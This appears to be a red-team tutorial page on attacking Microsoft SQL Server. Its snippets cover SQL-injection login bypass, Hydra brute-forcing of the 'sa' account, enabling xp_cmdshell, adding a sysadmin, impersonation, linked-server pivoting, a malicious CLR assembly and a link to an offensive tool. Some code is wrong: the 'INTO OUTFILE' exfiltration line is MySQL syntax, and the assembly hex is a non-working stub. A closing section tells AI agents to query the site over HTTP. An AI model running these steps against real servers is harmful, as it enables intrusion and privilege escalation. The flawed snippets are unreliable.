# Attacking MSSQL

**Introduction to MSSQL Attacks**

Microsoft SQL Server (MSSQL) is a widely used relational database management system. While it provides robust security features, it is also a target for various cyber attacks. Attackers often aim to exploit misconfigurations, vulnerabilities, or weak security practices to gain unauthorized access, escalate privileges, and exfiltrate data. Understanding the common attack vectors against MSSQL is essential for both offensive security professionals and defenders.

**Common MSSQL Attack Vectors**

**SQL Injection:** SQL injection remains one of the most prevalent attack methods against MSSQL. This attack exploits vulnerabilities in web applications by inserting malicious SQL code into input fields, allowing attackers to execute arbitrary SQL commands. The impact of SQL injection can range from unauthorized data access to complete control over the database server.

In this example, the attacker comments out the rest of the query, bypassing the password check and potentially gaining unauthorized access.

{% code overflow="wrap" %}

```sql
SELECT * FROM Users WHERE Username = 'admin' --' AND Password = 'password';
```

{% endcode %}

**Brute Force Attacks:** Attackers often use brute force techniques to guess the credentials of MSSQL accounts. Tools like Hydra or Metasploit can automate this process, attempting thousands of password combinations until a valid one is found. Ensuring strong, complex passwords and implementing account lockout policies can mitigate this risk.

```bash
hydra -l sa -P /path/to/passwords.txt mssql://192.168.1.100
```

**Misconfigurations:** Misconfigurations in MSSQL can lead to severe security breaches. Common misconfigurations include enabling the `xp_cmdshell` extended stored procedure, which allows execution of system commands, or using default credentials. Regular security audits and adherence to best practices are critical to preventing such issues.

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'dir';
```

**Privilege Escalation:** Attackers can exploit vulnerabilities or misconfigurations to escalate privileges within MSSQL. For instance, exploiting a SQL injection vulnerability to execute stored procedures with higher privileges or leveraging weak permissions on database objects.

```sql
EXEC sp_addsrvrolemember 'attacker', 'sysadmin';
```

**Data Exfiltration:** Once attackers gain access to MSSQL, they often seek to exfiltrate sensitive data. This can be done through various means, such as exporting data to a remote server, writing data to disk, or using network protocols.

```sql
SELECT * INTO OUTFILE '/tmp/data.csv' FROM sensitive_table;
```

### **Advanced MSSQL Attack Techniques**

**Using Impersonation:** Impersonation allows an attacker to execute commands as another user. This is particularly useful if the attacker can impersonate a user with higher privileges. The `EXECUTE AS LOGIN` and `EXECUTE AS USER` statements facilitate this.

```sql
EXECUTE AS LOGIN = 'sa';
SELECT * FROM sysadmin_sensitive_data;
```

**Pivoting and Lateral Movement:** After compromising an MSSQL server, attackers often pivot to other systems within the network. This can be achieved using linked servers, which allow MSSQL servers to communicate and execute queries across different servers.

{% code overflow="wrap" %}

```sql
EXEC sp_addlinkedserver 'LinkedServer', '', 'SQLNCLI', 'remote_server';
EXEC ('SELECT * FROM remote_database.dbo.table') AT LinkedServer;
```

{% endcode %}

**Abusing CLR Assemblies:** MSSQL allows the creation of custom CLR (Common Language Runtime) assemblies, which can be exploited to execute arbitrary code. Attackers can create and load malicious assemblies to perform a variety of actions, including privilege escalation and system compromise.

{% code overflow="wrap" %}

```
CREATE ASSEMBLY [MaliciousAssembly]
AUTHORIZATION [dbo]
FROM 0x4D5A90000300000004000000FFFF0000B800000000000000;
CREATE PROCEDURE [dbo].[MaliciousProc]
AS EXTERNAL NAME [MaliciousAssembly].[Namespace].[Method];
EXEC [dbo].[MaliciousProc];
```

{% endcode %}

### SQL User Impersonation Attacks

It is crucial to understand that only users with the specific Impersonate permission are permitted to use impersonation. This permission is not included in the default set of permissions for most users. However, database administrators might unintentionally introduce misconfigurations, leading to potential privilege escalation.

For the purposes of this example, we have set up an impersonation permission misconfiguration on the SQL server running on dc01. Impersonation can be utilized in two different ways. First, it is possible to impersonate another user at the login level using the EXECUTE AS LOGIN statement. Second, it can also be done at the user level with the EXECUTE AS USER statement.

Initially, we will illustrate impersonation at the login level. Because of our limited access, we cannot easily identify which logins our current login can impersonate. However, we can determine which logins allow impersonation, although we cannot see who has the permission to impersonate them. This information can be obtained using the following database query:

{% code overflow="wrap" %}

```sql
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

{% endcode %}

<figure><img src="/files/G65kjGRSjaMapQcTnrZu" alt=""><figcaption><p><em>'sa' account can be impersonated</em></p></figcaption></figure>

{% embed url="<https://github.com/sartlabs/OffensiveTools/blob/main/SQL_Impersanation.exe>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.redteamgarage.com/attacking-mssql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.